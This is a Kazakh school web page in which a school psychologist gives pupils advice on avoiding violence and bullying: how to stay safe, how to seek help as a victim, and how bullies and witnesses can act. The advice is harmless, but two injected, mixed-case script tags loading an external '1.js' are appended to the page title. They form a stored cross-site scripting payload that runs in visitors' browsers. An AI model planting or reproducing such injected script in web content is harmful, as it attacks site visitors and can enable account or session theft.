Қалай зорлық – зомбылыққа, әлімжеттікке душар болмау керек?<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

08.12.2020

Қалай зорлық – зомбылыққа, әлімжеттікке душар болмау керек? 

 - Көшеде түнгі беймезгіл уақытта қалмауға тырысу, көшеде танымайтын адамдармен әңгімелеспеу және онымен қараңғы жерлерге, адамдар жоқ орындарға және т.б. жерлерге бармау.

-  Егер саған тұрмыстық зорлық – зомбылық қауіп төндірсе, үйден кетіп қалуға тырысу, ертерек қашып кетуге сөмкеңді дайындау, тиісті құжаттарыңмен бірге, көрші – көлемдеріңмен сөйлесу, айқай – шу шығарылғанда келу және полицияға хабарлау.

-  Қауіп-қатерді азайту,  зейінді болу, сақтық шараларын сақтау, қауіпті жағдайлардың алдын алуға үйрену керек, ондай жағдайларды сендер дала немесе үйде де кездестірулерің мүмкін.

- Үйде жалғыз болғанда, бөтен адамдарды үйге кіргізбеу керек;

 -  Бөтен біреудің машинасына отырмау керек.

 - Көшенің қараңғы жерлерінен, көпшілік жүрмейтін саябақтар мен стадиондардан аулақ жүру.

Егер әлімжеттіктің құрбаны болсаң не істеуің керек?

-Ешқашан біреуден   қысым көріп жүргеніңді жасырма.

-Көмек сұра: психологтан, ата-анаңнан мұғалімнен.

-Өзіңді ешқашан кіналама.

-Әлімжеттік жасаған адамды ақтама!

-Өзің басқаларға әлімжеттік көрсетуші болсаң не білуің керек?

-Кейбір нәрселер сен үшін қызық,күлкілі болып көрінуі мүмкін бірақ ол әрекеттерің басқа   адамның жан дүниесіне ауыр тиюі мүмкін.

-Әлімжеттік сенің болмысың емес,ол сенің теріс қылықтарың екенін түсін.

-Әлімжеттік үшін заң алдында жауаптылық бар екенін ұмытпа!

Егер біреудің  әлімжеттік жасағанын көрсең не істеу керек?

-Дереу айналадағы ересектерден көмек сұра!

-Әлімжеттіктен бірден бас тарт.

-Егер сенің досың әлімжеттікке тап болса онымен ашық сөйлесуге тырыс. 

- Себебі ол сенің көмегіңе өте мұқтаж!

Естеріңде болсын!

Әлімжеттік-әлсіздің ісі

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

«Өзен жалпы білім беретін орта мектеп» КММ

 

 

 

 

 

Қалай зорлық – зомбылыққа, әлімжеттікке душар болмау керек?

 

 

 

 

Мектеп психологі:

Магзумова А.О.

 

 

2020-2021 оқу жылы

Просмотров: 1425


Пікір қосу



Деректерді қолтаңбаға қосу